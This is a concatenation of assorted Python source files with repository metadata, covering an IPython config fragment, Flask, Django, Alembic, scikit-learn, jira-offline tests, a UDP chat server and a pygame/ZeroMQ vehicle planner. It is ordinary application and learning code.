# Set the profile location directly. This overrides the logic used by the
# `profile` option.
# c.ProfileDir.location = ''
#------------------------------------------------------------------------------
# PlainTextFormatter configuration
#------------------------------------------------------------------------------
# The default pretty-printer.
#
# This uses :mod:`IPython.lib.pretty` to compute the format data of the object.
# If the object cannot be pretty printed, :func:`repr` is used. See the
# documentation of :mod:`IPython.lib.pretty` for details on how to write pretty
# printers. Here is a simple example::
#
# def dtype_pprinter(obj, p, cycle):
# if cycle:
# return p.text('dtype(...)')
# if hasattr(obj, 'fields'):
# if obj.fields is None:
# p.text(repr(obj))
# else:
# p.begin_group(7, 'dtype([')
# for i, field in enumerate(obj.descr):
# if i > 0:
# p.text(',')
# p.breakable()
# p.pretty(field)
# p.end_group(7, '])')
# PlainTextFormatter will inherit config from: BaseFormatter
#
# c.PlainTextFormatter.type_printers = {}
#
# c.PlainTextFormatter.newline = '\n'
#
# c.PlainTextFormatter.float_precision = ''
#
# c.PlainTextFormatter.verbose = False
#
# c.PlainTextFormatter.deferred_printers = {}
#
# c.PlainTextFormatter.pprint = True
#
# c.PlainTextFormatter.max_width = 79
#
# c.PlainTextFormatter.singleton_printers = {}
#------------------------------------------------------------------------------
# IPCompleter configuration
#------------------------------------------------------------------------------
# Extension of the completer class with IPython-specific features
# IPCompleter will inherit config from: Completer
# Instruct the completer to omit private method names
#
# Specifically, when completing on ``object.<tab>``.
#
# When 2 [default]: all names that start with '_' will be excluded.
#
# When 1: all 'magic' names (``__foo__``) will be excluded.
#
# When 0: nothing will be excluded.
# c.IPCompleter.omit__names = 2
# Whether to merge completion results into a single list
#
# If False, only the completion results from the first non-empty completer will
# be returned.
# c.IPCompleter.merge_completions = True
# Activate greedy completion
#
# This will enable completion on elements of lists, results of function calls,
# etc., but can be unsafe because the code is actually evaluated on TAB.
# c.IPCompleter.greedy = False
| [
"[email protected]"
] | |
cbd4fffa89d3721fb45c73392b5d55aa7d22d7eb | fc79b08e3d8f16c88e57b8674eebd5a610ababdc | /globomap_api/run.py | df2b60a8b03bdffcafb07f13a7d993d0cfcff688 | [] | no_license | victor-mendes-eduardo/globomap-api | e8b95cf33269c92c927ca30c7092d33f0f8e8cac | c1cce956eb4fdfb178bc32cc8ed60605e547c7f3 | refs/heads/master | 2021-01-15T19:06:51.094379 | 2017-08-07T19:29:20 | 2017-08-07T19:29:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | import logging
from logging.handlers import RotatingFileHandler
from os import environ
from app import create_app
if __name__ == '__main__':
application = create_app('config')
handler = RotatingFileHandler('foo.log', maxBytes=10000, backupCount=1)
handler.setLevel(logging.INFO)
application.logger.addHandler(handler)
application.run('0.0.0.0', int(environ.get('PORT', '5000')))
| [
"[email protected]"
] | |
99f106571951309d30c6c2ad0f813c3924e240d1 | eba57b688107b20438ad3035359e677909997371 | /chapter_2/html_parsing.py | 50711c9bad2815bfa5928e5bc5e0271dde1c64a9 | [] | no_license | kerenskybr/pratical_nlp_book | 3c7ea19c0ebf9af3be4864c3fcb205552c69936d | dc11fac65a92aa5b2878c080658f24aaaf05dfdb | refs/heads/main | 2023-05-03T13:21:31.013796 | 2021-05-14T14:30:02 | 2021-05-14T14:30:02 | 367,171,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | from bs4 import BeautifulSoup
from urllib.request import urlopen
myurl = 'https://stackoverflow.com/questions/415511/how-to-get-the-current-time-in-python'
html = urlopen(myurl).read()
soupfied = BeautifulSoup(html, "html.parser")
question = soupfied.find("div", {"class":"question"})
questiontext = question.find("div", {"class":"s-prose"})
print("Question: \n", questiontext.get_text().strip())
answer = soupfied.find("div", {"class": "answer"})
answertext = answer.find("div", {"class":"s-prose"})
print("Best answer: \n", answertext.get_text().strip()) | [
"[email protected]"
] | |
f45946dfed7777fc15b4a74ece44cbbc88ec96ea | 62286a2f8f717b156c15a2671159e5870db9e964 | /src/schemas/BudgetSchema.py | d0b72e7f2293fe56430c7bf3475eaa6e56c9dac1 | [] | no_license | HarryTranAU/my_money_app | c44026e6c0d9613d63fedca5a9c1b77d6fc796cc | eb34fb708ed4d844c8ca1cfe1a1a5e9af1b2e0d3 | refs/heads/main | 2023-01-15T16:19:42.779324 | 2020-11-24T08:58:44 | 2020-11-24T08:58:44 | 305,883,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | from main import ma
from models.Budget import Budget
from schemas.UserSchema import UserSchema
from marshmallow.validate import Length
class BudgetSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Budget
name = ma.String(required=True, validate=Length(min=1))
user = ma.Nested(UserSchema)
budget_schema = BudgetSchema()
budgets_schema = BudgetSchema(many=True)
| [
"[email protected]"
] | |
ad31f228980176aeeadc3048937a55e51ab81b67 | bb598592744413b1500b85853a990cbc3bde7d1b | /random_demos/xml_minidom.py | 88bc8ea853b3f02f14cf57a11838502b68f44c00 | [
"MIT"
] | permissive | t4d-classes/advanced-python_11012021 | dabe784a81f4c45c85575aef4c7b9aeb054024f6 | a365382c6d8f06ae13fa54719935dcb229a35053 | refs/heads/main | 2023-08-30T10:25:04.345819 | 2021-11-06T00:05:58 | 2021-11-06T00:05:58 | 423,454,737 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | from xml.dom import minidom
# parse an xml file by name
file = minidom.parse('sample.xml')
#use getElementsByTagName() to get tag
colors = file.getElementsByTagName('color')
# one specific item attribute
print(colors[1].attributes['hex'].value)
# all item attributes
for color in colors:
print(color.attributes['hex'].value)
# one specific item's data
print(colors[1].firstChild.data)
print(colors[1].childNodes[0].data)
# all items data
for color in colors:
print(color.firstChild.data) | [
"[email protected]"
] | |
fe16e2e20b608f33ab3733a7142c1e62a8e6bb16 | b847c1bb6ccdb57aaf860da1d1bfc762799e54f7 | /07_语法进阶/sin_09_加等于.py | e7696477b91ad5d08cb973d3a4a86d272dfa9a57 | [] | no_license | numRandom/new_pythonCode | 2d4dba8220d9c87794cd8ff6ce401d91770d1360 | 5f7eb14ed76b5d007475138d033e991e4e85baf7 | refs/heads/master | 2020-12-27T13:57:03.887078 | 2020-02-06T10:27:11 | 2020-02-06T10:27:11 | 237,926,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 357 | py | def demo(num,num_list):
print("函数开始")
num += num
# 列表变量使用 += 不会做相加再赋值的操作!
# 本质上是在调用 extend 方法
num_list += num_list
print(num)
print(num_list)
print("函数完成")
gl_num = 9
gl_list = [1,2,3]
demo(gl_num,gl_list)
print(gl_num)
print(gl_list) | [
"[email protected]"
] | |
b67ef1caee31870b006529104a537bcb51f25871 | 4e1d6978daf95140b9b02d9454af76e225bd6537 | /blog/forms.py | d2c828db50a5c1e3577e219a547965f24369fb2a | [
"MIT"
] | permissive | hairinhi/practice_django | afce74d22c1f0b8b3e7fa0acbc4c2f6f7b0d8c20 | db4442f299c3d5c4e03c38e43b1399b5c53dd57f | refs/heads/master | 2022-02-16T18:44:33.587226 | 2019-08-18T01:43:33 | 2019-08-18T01:43:33 | 197,946,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | from django import forms
from .models import Blog
class BlogForm(forms.ModelForm):
content = forms.CharField(widget=forms.Textarea(attrs={'rows':15, 'cols':120}))
class Meta:
model = Blog
fields = ["content"]
| [
"[email protected]"
] | |
eaaa0e9a1a66be306450e7ea8d242ebbcd2ccbbf | f9640f1eee714b0788d1b6314bcf12b7369e9374 | /Beginner/1001.py | 4892fb59526abb83cc0c9a8f63b7feb180bb7612 | [] | no_license | Txiag/URI-Python | b5c39649fd6a239da60ad045d548b5c83fa2db29 | ace48fc516cdfa3d5964369e6cdb710ae023cba0 | refs/heads/master | 2020-04-11T19:57:56.811574 | 2019-04-20T09:26:55 | 2019-04-20T09:26:55 | 162,053,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | print("X =", int(input())+int(input()))
| [
"[email protected]"
] | |
76c54e28ed384643636c1d9bc0edcbeeeb1519e7 | cdc1d827d37acf51e742af96b5cb5cfecbc3cdf8 | /unitTest.py | eca4ecc7422993d075de6fc25418ba728ace8034 | [] | no_license | corygoates/PropulsionOptimization | 9e52612fb14cd3c0b2eac38078be92b5b3742ec4 | 2e2a510045175afa08b208b3b6e5af00ead1701f | refs/heads/master | 2020-03-28T15:01:39.778279 | 2018-09-18T16:35:29 | 2018-09-18T16:35:29 | 148,547,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | import propulsionUnitClass as unit
prop = "kyosho_10x6"
motor = "Kontronik Pyro 700-34"
battery = "Turnigy 5000mAh 40C"
numCells = 3
esc = "Kontronic SUN 3000"
altitude = 2000
test = unit.PropulsionUnit(prop, motor, battery, numCells, esc, altitude, True)
print("Initialization complete. Plotting thrust curves.")
maxAirspeed = 100
numVelocities = 11
numThrottles = 100
test.PlotThrustCurves(maxAirspeed, numVelocities, numThrottles)
| [
"[email protected]"
] | |
aaef2aed639eb6b69a0b8d76fd8e02c85dd8e4a8 | 512ac9a9159c6b93d6f0a08449c9efae9200fe42 | /test/sync/test_push_issues.py | 54f1d26c0f343c33dcd872882c32c559b2f19f03 | [
"MIT"
] | permissive | FROSADO/jira-offline | 9c9d801377a50fe1c0b467ec6257d04cef51e2dc | 53d5c9f61bc1bbb96e999be0374e85d981729f96 | refs/heads/master | 2023-06-04T15:56:21.088300 | 2021-06-19T09:59:38 | 2021-06-19T09:59:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,643 | py | '''
Tests for push_issues() in the sync module
'''
from unittest import mock
from fixtures import (ISSUE_1, ISSUE_1_WITH_ASSIGNEE_DIFF, ISSUE_1_WITH_FIXVERSIONS_DIFF, ISSUE_2,
ISSUE_NEW)
from jira_offline.models import Issue
from jira_offline.sync import IssueUpdate, push_issues
@mock.patch('jira_offline.sync.merge_issues')
@mock.patch('jira_offline.sync.issue_to_jiraapi_update')
def test_push_issues__calls_fetch_and_check_resolve_once_per_issue(
mock_issue_to_jiraapi_update, mock_merge_issues, mock_jira
):
'''
Ensure fetch_issue(), merge_issues() and issue_to_jiraapi_update() are called
once per modified issue
'''
# add an unchanged Issue and two modified Issues to the Jira dict
mock_jira['TEST-71'] = Issue.deserialize(ISSUE_1)
mock_jira['TEST-71.1'] = Issue.deserialize(ISSUE_1_WITH_ASSIGNEE_DIFF)
mock_jira['TEST-71.2'] = Issue.deserialize(ISSUE_1_WITH_FIXVERSIONS_DIFF)
with mock.patch('jira_offline.sync.jira', mock_jira), mock.patch('jira_offline.jira.jira', mock_jira):
push_issues()
assert mock_jira.fetch_issue.call_count == 2
assert mock_merge_issues.call_count == 2
assert mock_issue_to_jiraapi_update.call_count == 2
@mock.patch('jira_offline.sync.merge_issues')
@mock.patch('jira_offline.sync.issue_to_jiraapi_update')
def test_push_issues__calls_update_issue_when_issue_has_an_id(
mock_issue_to_jiraapi_update, mock_merge_issues, mock_jira
):
'''
When Issue.id is set, ensure update_issue() is called, and new_issue() is NOT called
'''
# add a modified Issue to the Jira dict
mock_jira['TEST-71'] = Issue.deserialize(ISSUE_1_WITH_ASSIGNEE_DIFF)
# mock merge_issues to return NO conflicts
mock_merge_issues.return_value = IssueUpdate(merged_issue=mock_jira['TEST-71'])
with mock.patch('jira_offline.sync.jira', mock_jira), mock.patch('jira_offline.jira.jira', mock_jira):
push_issues()
assert mock_jira.update_issue.called
assert not mock_jira.new_issue.called
@mock.patch('jira_offline.sync.merge_issues')
@mock.patch('jira_offline.sync.issue_to_jiraapi_update')
def test_push_issues__calls_new_issue_when_issue_doesnt_have_an_id(
mock_issue_to_jiraapi_update, mock_merge_issues, mock_jira
):
'''
When Issue.id is NOT set, ensure new_issue() is called, and update_issue() is NOT called
'''
# add a modified Issue to the Jira dict
mock_jira[ISSUE_NEW['key']] = Issue.deserialize(ISSUE_NEW)
# mock merge_issues to return NO conflicts
mock_merge_issues.return_value = IssueUpdate(merged_issue=mock_jira[ISSUE_NEW['key']])
with mock.patch('jira_offline.sync.jira', mock_jira), mock.patch('jira_offline.jira.jira', mock_jira):
push_issues()
assert not mock_jira.update_issue.called
assert mock_jira.new_issue.called
@mock.patch('jira_offline.sync.merge_issues')
@mock.patch('jira_offline.sync.issue_to_jiraapi_update')
def test_push_issues__skips_issues_from_unconfigured_projects(
mock_issue_to_jiraapi_update, mock_merge_issues, mock_jira
):
'''
Ensure issues from unconfigured projects are ignored
'''
mock_jira['TEST-71'] = Issue.deserialize(ISSUE_1_WITH_ASSIGNEE_DIFF)
mock_jira['TEST-72'] = Issue.deserialize(ISSUE_2)
mock_jira['TEST-72'].project_id = 'notarealprojecthash'
with mock.patch('jira_offline.sync.jira', mock_jira), mock.patch('jira_offline.jira.jira', mock_jira):
push_issues()
assert mock_jira.fetch_issue.call_count == 1
assert mock_merge_issues.call_count == 1
assert mock_issue_to_jiraapi_update.call_count == 1
| [
"[email protected]"
] | |
390d864c98c6ed559e483260cfeea4971b289ead | b7f65250b675bd2bf299be8a901b39bef70af742 | /migrations/versions/b3435cda41c5_initial_database.py | 314ed3f8923398447c4aef73a8991af10ddb6555 | [] | no_license | ShoneKey/blog | 3fc997f5f2b38003efb9fb0140233303eb35341a | b6a32096e2d8ebba1ab55eca0d4abff41c15e810 | refs/heads/master | 2021-01-21T14:57:16.051412 | 2017-06-30T13:43:38 | 2017-06-30T13:43:38 | 95,362,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,572 | py | """initial database
Revision ID: b3435cda41c5
Revises:
Create Date: 2017-06-21 17:25:42.299000
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'b3435cda41c5'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('categories',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('roles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('tags',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=64), nullable=True),
sa.Column('role_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['role_id'], ['roles.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_users_username'), 'users', ['username'], unique=True)
op.create_table('posts',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('title', sa.String(length=64), nullable=True),
sa.Column('body', sa.Text(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('category_id', sa.Integer(), nullable=True),
sa.Column('tag_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['category_id'], ['categories.id'], ),
sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('title')
)
op.create_index(op.f('ix_posts_timestamp'), 'posts', ['timestamp'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_posts_timestamp'), table_name='posts')
op.drop_table('posts')
op.drop_index(op.f('ix_users_username'), table_name='users')
op.drop_table('users')
op.drop_table('tags')
op.drop_table('roles')
op.drop_table('categories')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
226b414598d38521cd196653069584391b141cf3 | 115a27e29bba3e73b60bcc5016f80a541c52e790 | /ML_by_OMAR/Part9-Dimensionality-Reduction/LDA_OMAR.py | 043bb121d0c8501c2dc486f52c3bfab00ada79ac | [] | no_license | OmarSayd/Machine-Learning-with-OMAR | 16bba0e4c679c61cd9fd977f5317ec698babb2b3 | a97de325f889b3f0a7d67dd888ac8ec355af858a | refs/heads/master | 2022-11-18T08:50:05.558521 | 2020-07-10T11:01:26 | 2020-07-10T11:01:26 | 278,610,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,095 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 9 17:03:33 2020
@author: Linear Discriminant Analysis by OMAR
"""
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Wine.csv')
X = dataset.iloc[:, 0:13].values
y = dataset.iloc[:, 13].values
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# LDA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
lda = LDA(n_components= 2)
X_train = lda.fit_transform(X_train, y_train)
X_test = lda.transform(X_test)
# Training the Logistic Regression model on the Training set
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state = 0)
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix, classification_report
cm = confusion_matrix(y_test, y_pred)
print(classification_report(y_test, y_pred))
# Visualising the Training set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_train, y_train
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green', 'blue')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green', 'blue'))(i), label = j)
plt.title('Logistic Regression (Training set)')
plt.xlabel('LD1')
plt.ylabel('LD2')
plt.legend()
plt.show()
# Visualising the Test set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_test, y_test
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green', 'blue')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green', 'blue'))(i), label = j)
plt.title('Logistic Regression (Test set)')
plt.xlabel('LD1')
plt.ylabel('LD2')
plt.legend()
plt.show() | [
"[email protected]"
] | |
437b56faa6c50f981f254c73f7c99dab8e2e5756 | 6e06f7fea4e64f139ddd6be9d140b5ff183746c7 | /rest-app/smartpicasso/urls.py | 146dbd032969b6123f1295fa95f76c0bf7aba75f | [] | no_license | dolatapatryk/smart-picasso | fb467fb5f7669d8ae238509191e1d0ffec64d557 | 73b44a2d6c466a0c21864da132027029f8af35dd | refs/heads/main | 2023-03-06T13:30:01.265853 | 2021-02-21T13:14:00 | 2021-02-21T13:14:00 | 340,902,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | """smartpicasso URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('api/', include('smartpicasso.app.user.urls')),
path('api/', include('smartpicasso.app.user_profile.urls')),
path('api/', include('smartpicasso.app.project.urls')),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
a31559b9e7241b52ad9e5f2149bb26ca5c0b7ae7 | b853c16efafa74a9e1cb076008a17c9d85389fca | /HOME/笔记/聊天室/cr-sever.py | 1fa2a940328c8a608ee7b540d71ae9d97e89b866 | [] | no_license | Jason0221/backup | 14c48f1adb871b915d6f0ba49a26396e7cf0cd64 | dfd54cbcf7c27b0df6249104747e9a7ceffcb392 | refs/heads/master | 2020-06-03T13:14:39.751679 | 2017-05-15T08:50:38 | 2017-05-15T08:50:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | #!/usr/bin/python
#coding=utf-8
from socket import *
from time import *
import sys
def login():
data,addr = sockfd.recvfrom(BUFERSIZE)
b = {data:addr}
a.update(b)
print data,'login'
print a
def chat():
# while True:
data,addr = sockfd.recvfrom(BUFERSIZE)
for i in a.keys():
sockfd.sendto(ctime(),a[i])
HOST = '10.1.1.130'
PORT = int(sys.argv[1])
ADDR = (HOST,PORT)
BUFERSIZE = 1024
sockfd = socket(AF_INET,SOCK_DGRAM,0)
sockfd.bind(ADDR)
a = {}
print "server strat...."
while True:
data,addr = sockfd.recvfrom(BUFERSIZE)
if data[0] == '*':
b = {data:addr}
a.update(b)
print a
for i in a.keys():
print 'i=:',i
print 'a[%s]:%s'%(i[1:],a[i])
sockfd.sendto('haha',a[i])
print '--------------------'
sockfd.close()
| [
"[email protected]"
] | |
4b170f7a2731de34cd240506f56d441b9303df3b | 8b54ed7d5f52d52f5f0a45911410337a79682c0a | /src/plannerm2.py | 0148c3e5e7097675be1c64172da39905ad210d10 | [
"MIT"
] | permissive | hanbro-inha/react-flask-UI | ce2d19500ae776d6df7cc46c28834290c58b0988 | 6c121802356b14e8c8278018fd05d7d53f4c49e6 | refs/heads/master | 2022-02-11T10:27:54.542523 | 2020-03-01T11:28:48 | 2020-03-01T11:28:48 | 244,133,727 | 0 | 0 | null | 2022-01-21T20:23:54 | 2020-03-01T11:05:45 | Python | UTF-8 | Python | false | false | 5,455 | py | import socket
import pygame
import time
import math
from pygame.locals import *
from shapely.geometry import Point
from shapely.geometry.polygon import Polygon
import pynmea2
import pymap3d
import serial
import zmq
import threading
ZMQ_WAVE_PORT = 5555
ZMQ_OP_PORT = 5558
pygame.init()
screen = pygame.display.set_mode((200,200))
pygame.display.set_caption('V2X')
clock = pygame.time.Clock()
font = pygame.font.SysFont(None, 24)  # missing in the original; Plannerm.display() references this name
ser = serial.Serial('/dev/ttyUSB0', 115200)
context = zmq.Context()
socket = context.socket(zmq.SUB)
pub = context.socket(zmq.PUB)
class Plannerm:
def __init__(self):
self.base_lat = 37.3847120383
self.base_lon = 126.65599282
self.base_alt = 45.538
#signal region constant
pt1 = -284,-342
pt2 = -296,-362
pt3 = -273,-376
pt4 = -261,-354
pt5 = -672,-34
pt6 = -687,-57
pt7 = -664,-75
pt8 = -648,-50
#line constant
self.P1X = -283
self.P1Y = -346
self.P2X = -668
self.P2Y = -52
region_1 = [pt1, pt2, pt3, pt4]
region_2 = [pt5, pt6, pt7, pt8]
self.polygon1 = Polygon(region_1)
self.polygon2 = Polygon(region_2)
#thread shared
self.v2x_data = None
self.v2x_addr = None
self.time_a = 0
self.time_b = 0
self.state_a = 0
self.state_b = 0
        self.loc = (0.0, 0)  # (dist, inside); pre-initialized so looper() can read it before the GPS thread reports
def get_xy(self, lat, lon, alt):
e, n, u = pymap3d.geodetic2enu(lat, lon, alt, self.base_lat, self.base_lon, self.base_alt)
return e, n
def parseNmea(self, dat):
dat = dat.decode("utf-8", "ignore")
        if dat[0:6] == '$GNGGA':
            msg = pynmea2.parse(dat)
            x, y = self.get_xy(msg.latitude, msg.longitude, msg.altitude)
            return x, y
        raise ValueError('not a GNGGA sentence')  # previously fell through to unbound x, y; the caller's except handles this
def loc_check(self,dat):
dist = 0
while 1:
try:
x, y = self.parseNmea(dat.readline())
except:
continue
tmp = 2
#for region
point = Point(x, y)
            # was two consecutive assignments where the second always overwrote the first
            if self.polygon1.contains(point):
                inside = 1
            elif self.polygon2.contains(point):
                inside = 2
            else:
                inside = 0
#for dist
if tmp == 1:
dist = math.sqrt((int(x) - self.P1X)**2 + (int(y) - self.P1Y)**2)
elif tmp == 2:
dist = math.sqrt((int(x) - self.P2X)**2 + (int(y) - self.P2Y)**2)
self.loc = (dist, inside)
def display(self, str):
text = font.render(str, True, (255, 255, 255), (159, 182, 205))
textRect = text.get_rect()
textRect.centerx = screen.get_rect().centerx
textRect.centery = screen.get_rect().centery
screen.blit(text, textRect)
pygame.display.update()
def v2x_stat(self):
socket.connect("tcp://192.168.123.253:5555")
socket.setsockopt(zmq.SUBSCRIBE, b"wave")
while 1:
result = socket.recv()
topic = result.decode()
if(topic.startswith('ff')):
try:
                    _, self.time_a, self.state_a, self.time_b, self.state_b, _ = topic.split('//')  # 4th field is time_b (was mistakenly assigned to time_a)
print("Parsed")
except:
print("Split Failed")
def looper(self):
data = "cc//0//0//0"
enable = 0
speed = 0
pub.bind("tcp://*:%s" % ZMQ_OP_PORT)
while 1:
pygame.event.pump()
keys = pygame.key.get_pressed()
if keys[K_o]:
enable = 1
elif keys[K_p]:
enable = 0
if enable == 1:
print('auto')
ta, sa, tb, sb = self.time_a, self.state_a, self.time_b, self.state_b
print("State1: %s, Time1: %s, State2: %s, Time2: %s, dist: %s inside : %d"
% (sa, ta, sb, tb, self.loc[0], self.loc[1]))
if(self.loc[1] and (sb == '3')):
data="cc//1//-2//0"
elif(self.loc[1] and (sb == '7')):
data="cc//1//-2//0"
else:
data="cc//0//0//0"
else:
print("Manual")
data = 'cc//0//0//0'
if keys[K_q]:
speed, enable = -1.5, 1
elif keys[K_w]:
speed, enable = -0.5, 1
elif keys[K_e]:
speed, enable = -0.1, 1
elif keys[K_a]:
speed, enable = 1.5, 1
elif keys[K_s]:
speed, enable = 0.5, 1
elif keys[K_d]:
speed, enable = 0.1, 0
data = "cc//" + str(enable) + "//" + str(speed) + "//0"
message = "planner" + data
pub.send(message.encode('ascii'))
clock.tick(100)
def run(self):
t1 = threading.Thread(target=self.v2x_stat)
t2 = threading.Thread(target=self.loc_check, args=(ser,))
# t3 = threading.Thread(target=self.looper)
t1.setDaemon(True)
t2.setDaemon(True)
t1.start()
t2.start()
self.looper()
# t3.run()
t1.join()
t2.join()
# t3.join()
def main():
planner = Plannerm()
planner.run()
if __name__ == '__main__':
main()
| [
"[email protected]"
] |